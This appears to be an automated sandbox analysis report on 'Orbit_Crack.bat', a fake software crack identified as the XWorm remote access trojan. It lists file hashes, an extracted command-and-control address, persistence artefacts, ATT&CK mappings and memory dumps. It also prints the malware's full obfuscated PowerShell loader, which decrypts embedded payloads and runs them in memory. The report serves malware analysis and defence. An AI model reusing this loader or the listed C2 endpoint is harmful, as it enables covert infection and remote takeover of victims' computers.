Overview

overview

10

Static

static

1

Orbit_Crack.bat

windows10-2004-x64

10

Resubmissions

27-04-2024 10:36

240427-mnkpdshd5s 10

27-04-2024 10:32

240427-mlfbwshc9v 10

Analysis

  • max time kernel
    149s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-04-2024 10:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Orbit_Crack.bat

  • Size

    259KB

  • MD5

    1ccd59dd2bbf3dc838039654fed99860

  • SHA1

    1d27c800b05db1f244afeaab7cd6f79549af0ff8

  • SHA256

    d3dea32d8b022205401a7d5023c1fb63577021b8c38d1b8af43e166fbaa15b24

  • SHA512

    58f44f000191551055f4d4fe001e4471ee2b8292cdecd14a6548d5917d78f886a92f4764ab9aea6273755c3da95d2bd0108350d3e11273f729759f140943fb4c

  • SSDEEP

    6144:AE29oanve5LJRxPZ9Q9lgj3B8BlKcurMBZoE589vlwaSIS:AVI5dP89yjGlKcCcasd

Score
10/10
xwormrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

youth-oecd.gl.at.ply.gg:37887

Mutex

irLH7SnIzjCRjwMK

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Drops startup file 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TCHWop+rKfjAUs8Gc6EIcZq3gKQUIuwod9lLSwDglHo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ANiW1ohpeww6mPCu5XWnXw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EobxR=New-Object System.IO.MemoryStream(,$param_var); $NLGjA=New-Object System.IO.MemoryStream; $XEFMi=New-Object System.IO.Compression.GZipStream($EobxR, [IO.Compression.CompressionMode]::Decompress); $XEFMi.CopyTo($NLGjA); $XEFMi.Dispose(); $EobxR.Dispose(); $NLGjA.Dispose(); $NLGjA.ToArray();}function execute_function($param_var,$param2_var){ $DLBIf=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $lObjd=$DLBIf.EntryPoint; $lObjd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat';$LWqwg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Orbit_Crack.bat').Split([Environment]::NewLine);foreach ($IVrtL in $LWqwg) { if ($IVrtL.StartsWith(':: ')) { $VyyZA=$IVrtL.Substring(3); break; }}$payloads_var=[string[]]$VyyZA.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:380
  • C:\Windows\system32\notepad.exe
    "C:\Windows\system32\notepad.exe"
    1⤵
      PID:1516
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2380

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Resource Development

    Reconnaissance

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mnza3vxv.zk4.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSys32.lnk
      Filesize

      779B

      MD5

      620d681b7ed901572838ed0085058c14

      SHA1

      8155ab8f1a73961dd283ec71c48bbc62614d2ce9

      SHA256

      1b0d34376e277bfa4c820f2a8f19e72bdb5b387f54bf990e0393959b24ac16b3

      SHA512

      48b2642853aba1585c612401247fd757e341846878805768af4acf848f39f12ae8f0fac3999e7c3add68d85723c28fc935f88c9bba1e9745e8f2c9581c89980b

      Download Submit
    • C:\Users\Admin\WindowsSys32
      Filesize

      442KB

      MD5

      04029e121a0cfa5991749937dd22a1d9

      SHA1

      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

      SHA256

      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

      SHA512

      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      Download Submit
    • memory/380-9-0x0000023941300000-0x0000023941322000-memory.dmp
      Filesize

      136KB

      Download
    • memory/380-10-0x00007FFF276D0000-0x00007FFF28191000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/380-12-0x0000023941400000-0x0000023941410000-memory.dmp
      Filesize

      64KB

      Download
    • memory/380-11-0x0000023941400000-0x0000023941410000-memory.dmp
      Filesize

      64KB

      Download
    • memory/380-13-0x0000023941350000-0x0000023941358000-memory.dmp
      Filesize

      32KB

      Download
    • memory/380-14-0x0000023941360000-0x0000023941392000-memory.dmp
      Filesize

      200KB

      Download
    • memory/380-15-0x0000023941390000-0x000002394139E000-memory.dmp
      Filesize

      56KB

      Download
    • memory/380-35-0x0000023941400000-0x0000023941410000-memory.dmp
      Filesize

      64KB

      Download
    • memory/380-34-0x00007FFF276D0000-0x00007FFF28191000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2380-20-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-26-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-27-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-31-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-30-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-29-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-28-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-25-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-21-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2380-19-0x0000028505150000-0x0000028505151000-memory.dmp
      Filesize

      4KB

      Download